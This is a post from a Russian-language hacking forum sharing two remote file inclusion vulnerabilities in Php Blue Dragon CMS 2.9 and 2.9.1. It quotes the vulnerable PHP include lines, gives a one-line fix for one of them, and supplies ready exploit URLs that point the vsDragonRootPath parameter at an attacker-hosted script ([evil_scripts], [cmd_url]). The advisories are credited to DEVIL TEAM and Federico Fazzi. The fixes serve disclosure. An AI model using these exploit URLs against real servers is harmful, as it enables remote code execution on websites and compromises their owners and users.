• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: Php Blue Dragon СMS

Ŧ1LAN

CPU register
Пользователь
Регистрация
19.12.2005
Сообщения
1 057
Решения
1
Реакции
6
Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability
Код:
// Szukanie u.ytkownika
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
-> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);

Fix:
Код:
// Szukanie u.ytkownika
$vsDragonRootPath = "./";
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
-> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Код:
http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts]
Видео:
с рапиды
:zns5: Скачать|Download
с мегаплода
:zns5: Скачать|Download
приятного просмотра и прослушивания(dj-spookY => b-side most wanted) =)
 
PhpBlueDragon CMS <= 2.9.1 (template.php) File Include Vulnerability
Описание:
Ошибка существует в template.php, line 23:
Код:
---
require($vsDragonRootPath."public_includes/pub_kernel/pbd_template_custom.php");
---
Пример/Эксплоит:
Код:
http://examplе/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/
 
[GL]
1)
Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability
DEVIL TEAM THE BEST POLISH TEAM
2)
PhpBlueDragon CMS <= 2.9.1 (template.php) File Include Vulnerability
Federico Fazzi
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх